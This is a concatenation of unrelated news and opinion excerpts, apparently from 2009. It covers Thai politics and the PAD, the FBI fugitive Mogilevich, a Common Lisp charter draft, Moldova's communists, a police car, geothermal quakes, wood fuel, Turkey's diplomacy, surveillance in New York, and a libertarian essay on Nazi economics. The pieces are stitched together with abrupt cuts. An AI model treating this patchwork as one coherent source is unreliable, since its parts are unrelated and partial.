They attacked police and then attacked a group of local villagers who were opposed to them .
Local villagers on both sides of the border have traditionally held joint religious ceremonies at the temple on this day .
This has not happened since the PAD forced the closure of the temple last year .
Teptai Senpong , personal spokesperson for Prime Minister Abhisit , earlier stated that there was no reason to declare a state of emergency in the border area “ as the PAD were defending Thai national interests ” .
The present foreign minister is a PAD supporter who took part in the illegal occupation of the international airports last December .
He is famed for being rude about the Cambodian government .
Suriyasai Takasila , PAD spokesperson , said that the PAD leadership would not turn its back on Wira Somkwamkit , the PAD leader who headed the violent raid on the border .
Naturally , the PAD riot and its extreme nationalism was supported by [ pro- government TV station ] ASTV .
The government will not prosecute the PAD and its leaders for their illegal violence .
They never have .
At the same time numerous Red Shirts are in jail or face prosecution .
Just like when the PAD took over the airports , it cares little for the impact on local people ’s employment and livelihoods .
It cares little if the sons of poor farmers , conscripted into the Thai army , die in a pointless shoot - out with their brothers in the Cambodian army .
The progressive , peaceful and democratic face of Thai society is the Red Shirts .
The violent , fascist and authoritarian face is the Yellow Shirt conservative royalists who control the state , the army , the monarchy , the government and the media .
The one thing they do not control is the hearts and minds of most Thai citizens .
Most
Thais are waiting for the king to die .
But that in itself will solve nothing , despite the fact that his son his universally hated and held in contempt .
No real democracy can be built without dismissing the generals , the judges , the Privy Council , the royal family and the corrupt politicians .
Will the Red Shirts be up to this people ’s revolution ?
Can it be an overwhelming movement of citizens in order to minimise bloodshed ?
These are the issues on many Thai people 's minds today .
[ Giles Ji Ungpakorn worked in the faculty of political science , Chulalongkorn University , Bangkok , Thailand .
He was forced to leave Thailand after being charged under Thailand 's anti-democratic les majeste laws .
He is an activist with the socialist Turn Left Thailand group .
Visit http://www.pcpthai.org/ and http://wdpress.blog.co.uk/.]
Editor 's Note :
In an exclusive series this week on " Campbell Brown , " the FBI has unveiled three additions to its list of the Ten Most Wanted Fugitives .
NEWTOWN , Pennsylvania ( CNN ) -- Semion Mogilevich may be the most powerful man you 've never heard of .
The FBI says Mogilevich , a Russian mobster , has been involved in arms trafficking , prostitution , extortion and murder for hire .
" He has access to so much , including funding , including other criminal organizations , that he can , with a telephone call and order , affect the global economy , " said FBI Supervisory Special Agent Peter Kowenhoven .
Mogilevich 's alleged brutality , financial savvy and international influence have earned him a slot on the FBI 's Ten Most Wanted Fugitives list , though he has lived and operated from Moscow , Russia , for years .
Watch CNN report on Mogilevich
" He 's a big man .
He 's a very powerful man , " FBI Special Agent Mike Dixon said .
" I think more powerful than a John Gotti would be , because he has the ability to influence nations .
Gotti never reached that stature . "
He is accused of swindling Canadian and U.S. investors out of $ 150 million in a complex international financial scheme .
It centered on a firm called YBM , which purportedly made magnets at a factory in Hungary .
Authorities say the scheme involved preparing bogus financial books and records , lying to Securities and Exchange Commission officials , offering bribes to accountants and inflating stock values of YBM , which was headquartered in Newtown , Pennsylvania .
In a raid in 1998 , FBI agents found a treasure trove of documents -- purchase orders , invoices , shipping orders , even technical drawings -- everything a legitimate business would produce .
But there was one thing missing .
" There were no magnets , " Dixon said .
It was all a sham , investigators say .
" In essence , what his companies were doing was moving money through bank accounts in Budapest and countries throughout the world and reporting these to the investment community as purchases of raw materials and sales of magnets , " Dixon said .
And because the company was publicly traded , anyone owning the stock would have made a lot of money .
" And of course Mogilevich controlled large , large blocks of stock from the outset , and he made a substantial amount of money in this process , " Dixon said .
Investors lost millions into the pockets of Mogilevich and his associates .
He and his associates were indicted in 2003 on 45 counts of racketeering , securities fraud , wire fraud , mail fraud and money laundering .
Russian authorities arrested him last year on tax fraud charges , but because the United States does not have an extradition treaty with Russia , he remained beyond the reach of U.S. law enforcement .
He is now free on bail .
The FBI believes Mogilevich moved on after YBM and began manipulating international energy markets , giving him a large influence on other nations .
Dixon noted that Mogilevich had control or influence over companies involved in natural gas disputes between Russia and Ukraine .
Authorities say Mogilevich , who has an economics degree from Ukraine , is known for his ruthless nature but also for his business acumen , which led to his nickname " the Brainy Don . "
" He has a very sophisticated , well - educated , loyal group of associates that he works with , " Dixon said .
" He hires top - notch consultants , attorneys , risk management firms to assist him and protect him in his criminal ventures . "
Louise Shelley , an organized crime expert from George Mason University , says Mogilevich is a new kind of criminal .
" The major criminal organizations in Russia have not only tapped into people with economics degrees , " Shelley said .
" They 've tapped into people with PHDs in finance and statistics who assist them . "
The FBI hopes Mogilevich will eventually travel to a country that has an extradition treaty with the U.S .
But , in case he does n't , his wanted poster will be distributed all over Russia .
[ cltl3 - devel ] RFC : CLtL3 Charter
Hello all , Below is a draft of the charter for the CLtL3 project .
Please comment as you see fit .
Cheers , drewc Purposes of the CLtL3 effort .
SECOND DRAFT - 2009 -08-31 - 1 ) The CLtL3 group wishes to create an updated description of Common Lisp .
It should codify existing practice and provide additional features to facilitate portability of code among diverse implementations .
2 ) The group intends the description to be a base for a larger " standard library " of code .
The focus of the effort will be to provide library authors with a stable and portable lisp on which to build an evolving distribution that meets the ever changing needs of modern developers .
3 ) The group will begin with ANSI Common Lisp as described in the _Common Lisp Hyperspec_ .
All possible effort will be made to ensure source compatibility .
The group does not intend to remove any functionality from the language , and will only deprecate features that are superseded by those in CLtL3 .
4 ) The group will address the following topics in the course of producing the description .
Preference will be given to topics that cannot be implemented portably and have multiple existing implementations .
( a ) Repairing mistakes , ambiguities , and minor ommissions in ANSI Common Lisp ( b ) Extensions outlined in the CDR ( including the MOP ) ( c ) Multiprocessing and Concurrency ( d) Foreign Function Interfaces ( e ) Extensible Streams ( f ) Extensible Sequences ( g ) Networking ( h ) OS and Filesystem access ( i ) Editing and Introspection 5 ) The CLtL3 effort will be a community effort .
Discussion will take place on public forums .
Any source code or documents produced will be placed under a permissive open source license that also allows commercial use and redistribution .
COMRAT , Moldova —
The cast - iron statue of Vladimir Lenin gazing severely from this regional capital ’s town hall may look a bit weather - beaten , but the important fact is that it is still standing .
Old Vlad ’s likeness could be seen as a metaphor for the fortunes of Moldova ’s Communist Party as a whole .
The communists received a political battering recently , but they are still far from vanquished completely .
Last month another Vlad — Vladimir Voronin , the party ’s iron - willed leader — resigned as Moldova ’s president after eight years , ending the reign of Europe ’s only communists to hold power .
The resignation was required by the country ’s constitution after a coalition of western - leaning parties , the Alliance for European Integration , eked out a victory in July in bitterly - contested parliamentary elections , winning 53 seats to the communists ' 48 .
The campaign saw the two opposing camps trading accusations of treason and dictatorial designs .
“ I hand over power to the hands of the new authorities with a heavy heart , " Voronin said in a statement Sept. 11 .
“ I do not believe that politicians who have made an alliance only on the basis of emotions of denial and complete denigration of their own country , with the only goal of distributing posts , are able to put forward a new positive program . ”
The party hardly resembles communists of old however :
Its leaders have embraced free market economics and speak often of closer ties with the European Union .
But they also have struck a chord among large portions of the population by combining a nostalgia for the past , a reputation as a guarantor for stability and a pinch of populist politics — by raising pensions every year , for example ( though these increases do not keep pace with inflation ) .
The large numbers of Moldovans who work abroad also contribute indirectly to the Communists ' strength : Many who would vote against the party cannot cast absentee ballots .
Not many overseas Moldovans vote because to do so they must visit at an embassy or consulate , and there simply are n't that many Moldovan embassies and consulates abroad .
Also , many overseas Moldovans are working illegally in the countries in which they are located and , while they would likely vote for the non-communist parties that favor closer ties with the EU and simpler immigration laws , they are also reluctant to do anything " official " that would draw attention to themselves .
Nowhere is the communists ’ continued grip on large parts of Moldova ’s psyche more evident than in Comrat , the regional capital of Gagauzia , an autonomous ethnic enclave in Moldova ’s south where the communists collected nearly 80 percent of the vote in the parliamentary elections .
In Comrat ’s open - air market , traders sit in idle groups , whiling away the afternoon as a smattering of customers wander half - heartedly through the mostly shuttered stalls .
The economic crisis has begun to squeeze the region hard , because wine exports , the main money maker , have dropped precipitously .
Nevertheless , few here speak favorably of the “ democrats , ” as many here refer to the anti-communist opposition .
For Gagauzia locals , the parties that make up the newly - elected Alliance are associated mostly with the economic chaos of the 1990s , when they were last in power .
“ Stability — most of all the last eight years have been stable , ” says Ivan Bessarab , a trader .
Possibly even more important is the ethnic fear factor that the communists have stoked .
Before World War II Moldova was part of Romania , and the Moldovans are ethnically indistinguishable from their cousins across the border .
The communists play on ethnic minorities ’ fears — which are also significant among local Russians and Ukrainians — and claim that nationalist parties seek a “ Moldova for the Moldovans . ”
In Gagauzia , over 80 percent of the population is Gagauz , a Turkish people that converted to Christianity centuries ago and speaks primarily Russian or a Turkish dialect .
Among the Gagauz it is an article of faith ( abetted by communist advertisements ) that the Alliance wants not closer ties with Europe , but unification with Romania .
Alliance politicians have repeatedly denied this , however .
Despite their setbacks , the communists more than retain their capacity to generate mischief , if not regain power altogether .
They remain the country ’s single largest political party with almost 45 percent of the parliamentary vote .
The next largest group , the Liberal Democrats , won just over 16 percent , or 18 seats .
Moldova ’s legislature , not the general electorate , in fact chooses the country ’s president .
Since 61 votes are needed , the Alliance needs to entice eight communist deputies to cross the aisle .
So far the communists are standing firm .
The parliamentary presidential vote has been set for Oct. 23 .
If parliament is unable to choose a president by Nov. 11 , the country might have to go through the whole thing again , with the acting president obliged to set a new election .
Political deadlock has already gripped the country of 4.3 million for almost six months , and could ultimately produce dire economic consequences .
Moldova is Europe ’s poorest nation , held barely afloat by a combination of agricultural exports and money sent back by the hundreds of thousands of citizens working abroad .
Both of these revenue streams have shrunk drastically because of the world economic recession , and the government is negotiating with international lending organizations to provide funds to patch a projected $ 700 million - gap in the national budget .
Voronin said that he is willing to work with the Alliance parties , but only if they sign onto declarations put forward by his party that seek to preserve the spending increases for pensions and the public sector .
For some observers , like Valeriu Prohnitchi , director of the Expert Group analytical center in Chisinau , despite the communists ’ ability to adapt to the winds of change — “ more opportunists than communists ” he said — Voronin ’s resignation signaled “ the beginning of the end as the dominant party of Moldova . ”
“ I do not believe that Voronin has necessary nerves and energy to come back , ” Prohnitchi said in an email message .
“ As the winds now are changing you will see how their political rhetoric changes as well . ”
Gagauzia ’s Bashkan , or governor , Mihail Formuzal — who is in fact a passionate anti-communist — said that the communists ’ hold even in his region is not as strong as it appears .
“ Our region is not pro-communist , but pro-Gagauz , ” he said .
Nevertheless , the statue of Lenin will stay for the time being .
“ I did not put it there , so it ’s not for me to take it away , ” he said .
An all - new Chevrolet Caprice Police Patrol Vehicle ( PPV ) will join the ranks of law enforcement departments across North America in 2011 .
General Motors confirmed the news today at the annual International Association of Chiefs of Police convention , in Denver , Colorado .
The announcement also ends months of speculation that the Pontiac G8 may live on as a police car but it builds hope that a version of the new Caprice may eventually be sold in local showrooms .
2011 Chevrolet Caprice Police Car
The Caprice PPV is a modern , full - size , rear - drive sedan that will offer both V - 8 and V - 6 engines , as well as a host of specialized equipment and features .
It rides on the same Zeta rear - wheel drive platform that underpins the Pontiac G8 and Chevrolet Camaro , although it uses the longest wheelbase of the architecture -- 118.5 - inches .
Much of the specs are being withheld but we do know that the car will come with a 6.0 - liter V - 8 engine churning out 355 - horsepower and an estimated 384 - pound - feet of torque at launch .
A smaller V - 6 model is due in 2012 .
Both will come with a six - speed automatic transmission , as well as touchscreen displays , specially contoured seats designed to fit police utility belts , a high - output alternator , and heavy - duty brakes .
2011 Chevrolet Caprice Police Car
The Caprice is a luxury rear - wheel drive sedan engineered and built by Holden in Australia .
The car is also sold in other markets wearing Buick , Chevrolet and Daewoo badges .
2011 Chevrolet Caprice Police Car
The Landau project will be allowed to continue operating while the review panel , which held its first meeting last Friday , deliberates .
Geox officials initially denied any responsibility for the temblor and continue to dispute the government ’s data linking the project to the quake .
The panel will , among other things , have to sort through the conflicting data presented by the company and government scientists .
Image
The geothermal plant in Landau in der Pfalz was under construction in 2007 and is now operational .
Credit ...
Torsten Silz/ddp
But some experts in the field say they worry that projects like the one in Germany , if the managers deny responsibility for inducing earthquakes or play down the effects on people ’s lives , could damage the reputation of geothermal energy , even in highly environmentally conscious areas of the world like California or Western Europe .
“ My concern is that the project leaders for different geothermal projects are about to waste public confidence as long as they do n’t talk openly about the seismic risks involved in their projects , ” said Rudolf Braun , who is the leader of the Basel study and is following events in Landau .
Like other earthquakes that have been attributed to geothermal plants , the Landau temblor was sudden and brief and was accompanied by a sound that in some cases has been likened to a sonic boom .
There were no injuries and there was no known structural damage to buildings in the city .
But the 2.7 magnitude quake has stoked fears and set off debate in the state Parliament , which subsidized the construction of the plant , about the method ’s safety .
The police logged as many as 200 calls after the quake , which struck shortly after 2 p.m. on Aug. 15 .
Stefanie Schuster was at the local supermarket when she heard a loud bang .
She said she wavered unsteadily on her feet “ like when you feel dizzy . ”
Police say they have arrested a Sydney man who claims he has been driving without a licence for more than 50 years .
The 67 - year - old from Wallacia was pulled over after he allegedly failed to stop at a stop sign at Luddenham in Sydney 's west on Monday .
He told police he had never held a licence in all the time he had been driving .
He will appear in court next month charged with not stopping at a stop sign and never holding a driver 's licence .
The power plant on our campus is set up so that it can burn either coal , natural gas or wood feed stocks .
At the present time the natural gas lines are blocked , since the trends of increasing price made it uneconomic to use within the boilers .
However the plant uses around wood for 40 % of the feed , and has for a number of years .
It helps , both with pollution control , and with the overall plant economics ( oftimes being cheaper per kwh generated ) .
We are located adjacent to a national forest and thus there is a ready supply of material .
This practice is beginning to catch on , as Bloomberg notes :
Using biomass for power and heat -- mainly from poplar , willow and pine trees -- grew by 25 percent during the past two decades , according to the International Energy Agency , the Paris - based adviser to 28 oil - consuming nations such as the U.S. Industrialized nations got 4 percent of their energy from biomass in 2006 , the most recent data available from the IEA .
That was the equivalent of 151 million tons of oil .
Chips of wood stumps and branches , heated to 400 degrees Celsius ( 750 degrees Fahrenheit ) at the Novus furnace , are as efficient as coal and cheaper : European Union rules do n’t require carbon - dioxide permits because the trees absorbed a like amount of the gas before harvest , making them carbon - neutral .
Now in relatively small quantities this is a viable program , and for domestic heating wood has long been a fall - back supply ( we buy several cords each winter to burn in our tile stove ) .
It is particularly useful as a supply in those parts of the country where solar and wind energies are not going to be locally available as viable resources ( long - term , long - distance transmission of generated power is an issue I ’ll duck today ) .
However , before everyone rushes out to get a stove , furnace , or even a fireplace it is worth reminding folks of some historic facts ( some of which Bloomberg also catches ) .
Generally you burn up a tree a whole lot faster than you can grow a new one .
Out of that reality grew the European practice of coppicing where the young limbs of the tree are harvested back to just above the stump , and the stump thenn allowed to regrow limbs .
( The practice dates back to before Henry VIII . )
Trees such as birch may , for example , be harvested every three or four years , while the basic root of the tree may survive for centuries .
Coppiced trees .
( Source Hampshire County Council )
The alternative practice is known as pollarding where the tree is first allowed to grow to some height , and then the limbs are cut back .
Because the growth then occurs at a later stage in the tree life , the trees will mature in a way that coppiced trees wo n’t though the production can come faster .
It is used where livestock could come in and eat the coppiced limbs ( Henry VIII passed laws about fencing the coppiced plantations , thereby enclosing parts of the forest ) .
Both practices were common in Europe with their need for fuel and fencing material , oak and willow being commonly harvested this way , and the characteristic tree shapes are a feature of landscape portraits by artists such as Gainsborough , Knight and Price .
It is a practice that , though laudatory for many reasons , has fallen into abeyance , since it is , among other things , very labor intensive .
It is suggested that less than 3 % of modern woodland is coppiced .
There are some attempts to regenerate the industry .
Pollarded Trees ( source Wikipedia )
Short of these land management and wood harvesting techniques , wood can only be expected to supply a limited amount of fuel before it too runs out .
Pelletizing the waste products from wood manufacture has created an industry that can , again , supply a limited market with fuel .
Until recently the price has been relatively stable in comparison with other fuels .
Relative wood pellet cost ( source New England Wood Pellet LLC )
An average household is anticipated to use some 2.67 tons of pellets a heating season , and they have advantages of being cleaner and simpler to operate than the wood that heats me at least three times ( stacking , moving and burning ) .
Were the whole nation to turn to wood , however , then as happened in Europe in previous times , the cost of the fuel could well skyrocket .
I have mentioned in earlier posts that King Edward I ( Longshanks ) tried to ban the burning of coal back around 1306 , but the costs for wood were so much higher , that the ban was ineffectual , as were subsequent bans by monarchs such as Elizabeth 1 .
And even today one finds that there are those who would rather burn coal than wood .
The stove that we have can be adapted ( using two grates in about 2 minutes ) to burn coal , however , as yet we have not examined that option .
The Bloomberg article notes that one supplier of pellets has already sold this year 's supply , and with 800,000 households ( I suspect many , like us in more rural parts of the country ) already using wood , overall supplies may also become tighter .
And , in Europe RWE is building wood - fired power plants , and eighteen months ago a large - scale plant opened on Teeside in the UK .
This 30 MWe plant uses 300.000 tons of woodchips a year .
The wood for the station comes from four separate sources .
Around 40 % of the 300,000t a year total is recycled wood from UK Wood Recycling .
This is received , stored and chipped on a nearby , separately owned site at Wilton .
A further 20 % comes to the site already chipped as offcuts from sawmills .
SembCorp is working with the Forestry Commission to bring another 20 % from north east forests in the form of small roundwood logs – items sometimes left on the forest floor after routine tree felling operations .
Finally , 20 % comprises specially grown energy crops in the form of short rotation coppice willow .
The company Greenergy is supplying the wood , to be grown by farmers and other landowners within a 50 - mile radius of the site .
The new plant required the growth of around 7,500 acres of coppice in the area , an activity that is creating local wildlife havens .
As an example of the benefits available to local farmers is the case of the Corrigans near Middlesborough and the power plant .
They have three 25 acre willow plantations , the first of which has just come to first harvest .
Once dried it will be shipped to Wilton and bring in around $ 20,000 .
As the plants mature this harvest is expected to increase .
There are other advantages
He said : " There has been a dramatic increase in insect and bird life especially snipe , woodcock , lapwings and reed bunting as well as pipistrelle and long eared bats and three species of owl .
So we have found a couple more words that you should probably add to your energy lexicon .
And they provide not only fuel , but also jobs .
Illustration by Peter Schrank
IT IS a thousand years since the Turks arrived in the Middle East , migrating from Central Asia to Anatolia .
For half of that millennium they ruled much of the region .
But when the Ottoman Empire fizzled out and the Turkish Republic was born in 1923 , they all but sealed themselves off from their former dominions , turning instead to Europe and tightly embracing America in its cold war with the Soviet Union .
The Turks are now back in the Middle East , in the benign guise of traders and diplomats .
The move is natural , considering proximity , the strength of the Turkish economy , the revival of Islamic feeling in Turkey after decades of enforced secularism , and frustration with the sluggishness of talks to join the European Union .
Indeed , Turkey 's Middle East offensive has taken on something of the scale and momentum of an invasion , albeit a peaceful one .
In the past seven years the value of Turkey 's exports to the Middle East and north Africa has swollen nearly sevenfold to $ 31 billion in 2008 .
From cars to tableware , dried figs to television serials , Turkish products , unknown a decade ago , are now ubiquitous in markets from Algiers to Tehran .
Already a vital conduit for sending energy from east to west , Turkey is set to grow in importance as more pipelines come on stream .
The most notable is Nabucco , a proposed € 7.9 billion ( $ 11.7 billion ) scheme to carry gas across Turkey from Azerbaijan and possibly Turkmenistan , Iran , Iraq and Egypt .
A single Turkish construction firm , TAV , has just finished an airport terminal for Egypt 's capital , Cairo , and is building others in Libya , Qatar , Tunisia and the United Arab Emirates .
Turks have scooped up hundreds of infrastructure contracts in Iraqi Kurdistan , and invested in shopping malls , hotels and even schools .
These achievements are partly due to an energetic pursuit of trading privileges , such as Turkey 's free - trade pacts with Egypt , Israel , Morocco and Tunisia .
It is seeking a similar deal with the six - member Gulf Co-operation Council , which includes Saudi Arabia .
Earlier this month , teams of Turkish ministers travelled to Baghdad and Damascus to sign a package of 48 co-operation deals with Iraq and 40 with Syria .
Covering everything from tourism to counter - terrorism and joint military exercises , the deals could end decades of tension between Turkey and its former Ottoman provinces .
Turkey 's prime minister , Recep Tayyip Erdogan , has just been warmly received in the Iranian capital , Tehran , a reflection of the realpolitik that has kept links open despite the Islamic Republic 's international isolation .
Turkey requires no visas for Iranians , and Mr Erdogan , who has stressed Iran 's right to nuclear power for civil purposes , pointedly congratulated Iran 's president , Mahmoud Ahmadinejad , after his disputed election win in June .
Turkey only recently made an historic breakthrough in relations with another eastern neighbour , Armenia .
If the parliaments of both countries endorse the move , diplomatic ties may be restored after a 16 - year freeze .
This dogged diplomatic pragmatism has been ardently pursued by the foreign minister , Ahmet Davutoglu , an ebullient professor of international relations who had long advised Mr Erdogan before his appointment in May .
Mr Davutoglu , who in a book described the Middle East as “ Turkey 's strategic depth ” , has called for a policy of “ zero problems with neighbours ” .
Reflecting the mild , modernist Islamism of the Justice and Development party , known by its Turkish initials AK , which has ruled Turkey since 2002 , the new policy seeks to use the soft power of trade , along with historical links , to project stability beyond Turkey 's frontiers .
This marks a distinct shift in worldview .
In the past Turkey tended to see itself as an eastern bulwark of the NATO alliance , whereas its Middle Eastern neighbours were viewed as threats to be contained .
Whatever Mr Davutoglu 's persuasive powers , this reorientation could not have happened without dramatic changes in Turkey .
Reforms undertaken partly to meet demands for EU membership have shifted power from threat - obsessed generals to civilian institutions , and to a new , more self - consciously Muslim elite rooted in Anatolia rather than Istanbul , Turkey 's Western - looking commercial and intellectual capital .
The AK party has also reversed decades of official policy by trying to meet the demands of Turkey 's large Kurdish minority ( some 14 m in a total population of 72 m ) .
The granting of more cultural and political rights , and the admission of past discrimination , have soothed tempers not only among Turkish Kurds , but among their ethnic kin in Iraq , Iran and Syria .
Yet a reason for the success of Turkey 's kinder , gentler approach is that it takes place in the context of a regional power vacuum .
Such relative Arab heavyweights as Egypt and Iraq no longer wield much clout .
American influence has also dipped in the wake of its troubles in Iraq .
Indeed , Turkey 's biggest breakthrough in Arab public opinion came in 2003 , when its parliament rejected an American request to open Turkish territory as a second front for the invasion of Iraq .
Turkey did allow the use of an airbase to supply the war , but escaped the opprobrium heaped on America 's Arab allies who grudgingly lent support to the toppling of Saddam Hussein .
Turkey has also been welcomed back because many Arabs see it as both a moderate counterweight to Iran and as a window to the West .
Iraqi Shias , for instance , are still wary of Iranian meddling in Iraq , even though Iraq 's main Shia parties have close relations with Iran .
Iraq 's Kurds , despite age - old tensions with Turkey , have also warmed their relations as trade has boomed and the looming departure of the Kurds ' American protectors raises the spectre of isolation .
The secular government of Syria , an ostensible ally of Iran , in fact shares little cultural affinity with its stridently Islamist rulers , compared with the AK party 's businesslike , tie - wearing officials .
Improved relations with Turkey , which now include visa - free travel , bring much - needed relief to Syria , isolated diplomatically and economically backward .
In fact , so eager has Syria been to woo Turkey that in 2005 it scrapped a longstanding territorial claim to Hatay , a province granted to Turkey in 1939 by France , Syria 's colonial master at the time .
Turkish officials , however , have been careful to explain that their renewed interest in the Muslim east does not mean a chill towards the West .
Instead , they present Turkey as a useful bridge , a regional force for peace , and the model of a democracy that is compatible with Islam .
Its Western allies have generally shared that view and have not opposed Turkey 's eastward shift .
Yet such benign indifference could change , if Turkey 's prospects for joining the EU die , or if Turkey is seen as undermining attempts to pressure Iran .
Already , Turkey 's gentle realignment has carried some costs , most obviously to its relations with Israel .
These flourished into a full - blown strategic partnership in the 1990s , before the AK party 's rise , when peace between Palestinians and Israelis seemed possible .
Joint military exercises and Israeli arms sales brought the two countries ' military establishments close , while trade and tourism expanded fast .
Israel even offered to shield Turkey from lobbies in the American Congress that sought to punish Turkey for disputing the genocide of Armenians in Ottoman territory during the first world war .
The end of an affair ?
But ties have frayed as Turkish public opinion , which now counts for more , has turned increasingly hostile to Israel .
Mr Erdogan , a tough , streetwise politician , felt slighted last year when Israel attacked Gaza only days after he had met Israel 's then prime minister , Ehud Olmert , who assured him that Turkish - brokered peace talks between Israel and Syria would resume .
The bloodshed in Gaza outraged many Turks , who heartily praised Mr Erdogan when he stormed out of a debate with Israel 's president , Shimon Peres , at Davos in Switzerland earlier this year .
The Turks were again angered in September when Israel denied Mr Davutoglu permission to cross into Gaza during a visit to Israel .
Earlier this month Turkey , citing Israel 's failure to deliver an order of military drone aircraft , abruptly cancelled joint air exercises .
Israel , for its part , lodged a formal protest at the airing , on Turkish state television , of a serial depicting Israeli soldiers as brutal killers .
Some Israeli officials say they detect signs of anti-Semitism that disqualify Turkey from mediating any longer between Syria and Israel .
Turkish officials respond that they have no intention of breaking off relations with Israel , and think they can still be a useful interlocutor with the Jewish state .
But they remain indignant .
“ We might have lost leverage with Israel , ” says an AK party man .
“ But I 'd rather be on the side of history , of what is right , of justice . ”
One of Mr Erdogan 's advisers puts Turkey 's case more boldly , in a sign of its growing confidence as a regional leader .
“ We are conditioning relations with Israel on the progress of the conflict , ” he says .
“ This is what the West should do . ”
A network of private and public surveillance cameras , license plate readers and weapons sensors already established in Lower Manhattan as an electronic bulwark against terrorist attacks will soon expand to a large patch of Midtown Manhattan , Mayor Michael R. Bloomberg and Police Commissioner Raymond W. Kelly said Sunday as they announced the allocation of $ 24 million in Homeland Security grants toward the effort .
Mr. Bloomberg said the expanded monitoring network would cover the areas between 30th and 60th Streets , from the Hudson to the East River .
“ We can not afford to be complacent , ” he said , noting that Midtown includes landmarks like Grand Central Terminal , the Empire State Building and the United Nations .
Like the system downtown , the expanded surveillance network would feed streams of data for analysis to a coordination center at 55 Broadway .
Mr. Bloomberg , who made the announcement at the center with Mr. Kelly , said work on the Midtown system would begin next year and be completed in 2011 .
Katie : “ You think , O.K. , do I kick somebody ’s door in ? ”
Kristy : “ My computer is burning up .
It ’s saying , ‘ I ’ve uploaded your résumé so many times , I ’m exhausted . ’ ”
Good kids who went to good schools , the brassy , effervescent Barry twins , 24 , always envisioned their young adulthood in New York City as a lush time of stimulating work , picturesque travel and a rich social orbit .
But they graduated into a downbeat nightmare of a job market .
According to an analysis of government data by the Economic Policy Institute , the unemployment rate for college graduates under 27 so far this year averaged 7.1 percent , nearly double what it was in 2007 and the highest yearly average in the 30 years this data point has been tracked .
And so Kristy and Katie and most of their friends are forever hunting for jobs , both mundane interim work to sustain them and long - term positions that could mean a career .
Many days , it is as if they are stalking something on the endangered species list .

They were born in Columbus , Ohio , the middle of six siblings .
Their parents divorced when they were 15 , and they do n’t stay in touch with their father but are close to their mother .
She is remarried and lives in Weehawken , N.J. , selling items for estates and art dealers and doing freelance writing .
The twins began at Marietta College in Ohio , then transferred as juniors to Rutgers ’s campus in Newark .
They graduated in May 2008 with journalism degrees , internships under their belt and student loans totaling $ 39,000 apiece .
Their dream is to work together in sports reporting or have a TV show , but they are flexible .
They talk of teaching piano , or inventing , say , a lipstick - case microphone .
“ If you ’re in a bar you would hold it up and say , ‘ This guy is creepy , get out of here , ’ ” Kristy explained .
She works as a bartender , three nights a week , at Dive 75 on West 75th Street , making about $ 800 a week .
Katie had been working at another bar , but was fired in June after landing in Cancun to begin a vacation .
Her boss said she played the music too loud .
Vampire Economy : Doing ...
Reimann , Gu00 fcnter Best Price : $ 9.99 Buy New null ( as of 02:35 EST - Details )
It was common on the left to intimate that George W. Bush was like Hitler , a remark that would drive the National Review crowd through the roof but which I did n’t find entirely outrageous .
Bush ’s main method of governance was to stir up fear of foreign enemies and instigate a kind of nationalist hysteria about the need for waging war and giving up liberty through security .
Hitler is the most famous parallel here , but he is hardly the only one .
Many statesmen in world history have used the same tactics , dating back to ancient times .
Machiavelli wrote in his Art of War advice to the ruler : “ To know how to recognize an opportunity in war , and take it , benefits you more than anything else . ”
But what ’s the point of studying Hitler ’s rise to power unless it is to learn from that history and apply the lessons ?
One lesson is to beware of leaders who come to power in troubled times , and then use foreign threats and economic crises to bolster their own power .
Unless we can draw out lessons for our own times , history becomes nothing but a series of dry data points with no broader relevance .
Certainly Bush used 9 - 11 to consolidate his power and the neoconservative intellectuals who surrounded him adopted a deep cynicism concerning the manipulation of public opinion .
Their governing style concerned the utility of public myth , which they found essential to wise rule .
The main myth they promoted was that Bush was the Christian philosopher - king heading a new crusade against Islamic extremism .
The very stupid among us believed it , and this served as a kind of ideological infrastructure of his tenure as president .
Then it collapsed when the economy went south and he was unable to sustain the absurd idea that he was protecting us from anyone .
The result was disgrace , and the empowering of the political left and its socialistic ethos .
The talk of Hitler in the White House ended forthwith , as if the analogy extended only when nationalist ideology is ruling the day .
What people do n’t remember is that Hitlerism was about more than just militarism , nationalism , and consolidation of identity politics .
It also involved a substantial shift in German domestic politics away from free enterprise , or what remained of it under Weimar , toward collectivist economic planning .
Nazism was not only nationalism run amok .
It was also socialism of a particular variety .
Let ’s turn to The Vampire Economy by Guenter Reimann ( 1939 ) .
He begins the story with the 1933 decree that all property must be subject to the collective will .
It began with random audits and massive new bookkeeping regulations :
Manufacturers in Germany were panic - stricken when they heard of the experiences of some industrialists who were more or less expropriated by the State .
These industrialists were visited by State auditors who had strict orders to “ examine ” the balance sheets and all bookkeeping entries of the company ( or individual businessman ) for the preceding two , three , or more years until some error or false entry was found .
The slightest formal mistake was punished with tremendous penalties .
A fine of millions of marks was imposed for a single bookkeeping error .
Obviously , the examination of the books was simply a pretext for partial expropriation of the private capitalist with a view to complete expropriation and seizure of the desired property later .
The owner of the property was helpless , since under fascism there is no longer an independent judiciary that protects the property rights of private citizens against the State .
The authoritarian State has made it a principle that private property is no longer sacred .
The rules begin to change slowly so that enterprise could no longer make decisions in the interest of profitability .
The banks were nationalized .
The heads of major companies were changed .
Hiring and firing became heavily politicized .
The courts ruled not on justice but on political priorities .
It was no longer enough merely to obey the laws .
The national will must trump economic concerns :
The capitalist under fascism has to be not merely a law - abiding citizen , he must be servile to the representatives of the State .
He must not insist on “ rights ” and must not behave as if his private property rights were still sacred .
He should be grateful to the Fuehrer that he still has private property .
This state of affairs must lead to the final collapse of business morale , and sound the death knell of the self - respect and self - reliance which marked the independent businessman under liberal capitalism .
Price controls were next , enforced intermittently and with them grew up a large gray economy , with businesspeople spending more time getting around the rules than producing wealth .
“ To increase his prices a dealer must have a special permit from the Price Commissar .
A request for a price increase must first be certified to by the group leader ; it must be accompanied by a detailed statement of necessity and other pertinent data , such as production and distribution costs . ”
State production mandates were next .
Goods were to be produced according to political goals .
“ Backed by the General Staff of the army , Nazi bureaucrats have been able to embark upon schemes which compel the most powerful leaders of business and finance to undertake projects which they consider both risky and unprofitable . ”
Speaking of Liberty Jr. , Llewellyn H. Rock ...
Best Price : $ 1.80 Buy New $ 8.65 ( as of 07:35 EST - Details )
Bankers were required to act as state actors .
“ Under fascism , big bankers , formerly independent — except , of course , u2018 non - Aryans ’ — have become State officials in everything but name .
They are often in high and influential positions , but they are all members of the compact , centralized State machine .
Their independence , their individual initiative , their free competitive position , all the principles for which they once fought fervently , are gone . ”
If you think that the parallels stopped after Bush left power , consider this passage from Reimann : “ The totalitarian State reverses the former relationship between the State and the banks .
Previously , their political influence increased when the State needed financial help .
Now the opposite holds true .
